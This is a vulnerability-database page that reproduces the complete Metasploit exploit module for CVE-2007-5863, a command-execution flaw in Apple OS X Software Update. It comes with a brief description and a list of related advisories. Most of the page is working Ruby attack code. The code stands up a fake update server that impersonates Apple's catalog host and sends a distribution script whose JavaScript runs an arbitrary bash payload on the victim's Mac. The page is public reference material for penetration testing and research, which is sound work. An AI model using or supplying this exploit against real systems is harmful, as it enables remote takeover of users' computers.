Lucene search
K

Apple OS X Software Update Command Execution

🗓️ 18 Dec 2007 04:30:12Reported by Moritz Jodeit <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 31 Views

Apple OS X Software Update Command Execution module exploits a feature in the Distribution Packages, allowing arbitrary command execution through JavaScript

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2007-5863
20 Sep 201000:00
circl
CVE
CVE-2007-5863
19 Dec 200721:00
cve
Cvelist
CVE-2007-5863
19 Dec 200721:00
cvelist
Exploit DB
Apple Mac OSX Software Update - Command Execution (Metasploit)
20 Sep 201000:00
exploitdb
Tenable Nessus
Mac OS X Multiple Vulnerabilities (Security Update 2007-009)
18 Dec 200700:00
nessus
NVD
CVE-2007-5863
19 Dec 200721:46
nvd
OpenVAS
Mac OS X Security Update 2007-009
12 May 201000:00
openvas
OpenVAS
Mac OS X Security Update 2007-009
12 May 201000:00
openvas
Packet Storm
appleupdate-exec.txt
18 Dec 200700:00
packetstorm
Packet Storm
Apple OS X Software Update Command Execution
31 Dec 200900:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple OS X Software Update Command Execution',
      'Description'    => %q{
          This module exploits a feature in the Distribution Packages,
        which are used in the Apple Software Update mechanism. This feature
        allows for arbitrary command execution through JavaScript. This exploit
        provides the malicious update server. Requests must be redirected to
        this server by other means for this exploit to work.
      },
      'Author'         => [ 'Moritz Jodeit <moritz[at]jodeit.org>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2007-5863'],
          ['OSVDB', '40722'],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby bash telnet bash-tcp',
            }
        },
      'Platform'	=> 'osx',
      'Targets'	=>
        [
          [
            'Automatic',
            {
              'Platform' => [ 'unix' ],
              'Arch'     => ARCH_CMD,
            },
          ],
        ],
      'DisclosureDate' => '2007-12-17',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
      ])
  end

  # Encode some characters using character entity references and escape any
  # quotation characters, by splitting the string into multiple parts.
  def encode_payload(payload)
    encoded = payload.gsub(/[&<>"']/) do |s|
      case s
      when '&'
        "&amp;"
      when '<'
        "&lt;"
      when '>'
        "&gt;"
      when '"'
        '"+\'"\'+"'
      when '\''
        "&apos;"
      end
    end
    return '"' + encoded + '"'
  end

  # Generate the initial catalog file with references to the
  # distribution script, which does the actual exploitation.
  def generate_catalog(server)
    languages = [ "", "Dutsch", "English", "French", "German", "Italian", "Japanese",
      "Spanish", "da", "fi", "ko", "no", "pt", "sv", "zh_CN", "zh_TW" ]
    productkey = rand_text_numeric(3) + "-" + rand_text_numeric(4)
    distfile = rand_text_alpha(8) + ".dist"

    sucatalog = '<?xml version="1.0" encoding="UTF-8"?>'
    sucatalog << '<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">'
    sucatalog << '<plist version="1.0">'
    sucatalog << '<dict>'
    sucatalog << '<key>Products</key><dict>'
    sucatalog << "<key>#{productkey}</key><dict>"
    sucatalog << '<key>Distributions</key><dict>'

    languages.each do |l|
      sucatalog << "<key>#{l}</key><string>http://#{server}/#{distfile}</string>\n"
    end

    sucatalog << '</dict></dict></dict></dict></plist>'

    return sucatalog
  end

  # Generate distribution script, which calls our payload using JavaScript.
  def generate_dist(payload)
    func = rand_text_alpha(8)

    dist = '<?xml version="1.0" encoding="UTF-8"?>'
    dist << "<installer-gui-script minSpecVersion='1'>"
    dist << '<options allow-external-scripts = "yes"/>'
    dist << "<choices-outline ui='SoftwareUpdate'>"
    dist << "<line choice='su'/>"
    dist << "</choices-outline>"
    dist << "<choice id='su' visible ='#{func}()'/>"
    dist << "<script>"
    dist << "function #{func}() { system.run('/bin/bash', '-c', #{encode_payload(payload)}); }"
    dist << "</script>"
    dist << "</installer-gui-script>"

    return dist
  end

  def on_request_uri(cli, request)
    date = Time.now
    server = "swscan.apple.com"

    header = {
      'Content-Type' => 'text/plain',
      'Last-Modified' => date,
      'Date' => date,
    }

    if request.uri =~ /\.sucatalog$/
      print_status("Sending initial distribution package")
      body = generate_catalog(server)
    elsif request.uri =~ /\.dist$/
      print_status("Sending distribution script")
      return if ((p = regenerate_payload(cli)) == nil)
      body = generate_dist(p.encoded)
    else
      return
    end
    send_response(cli, body, header)
    handler(cli)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation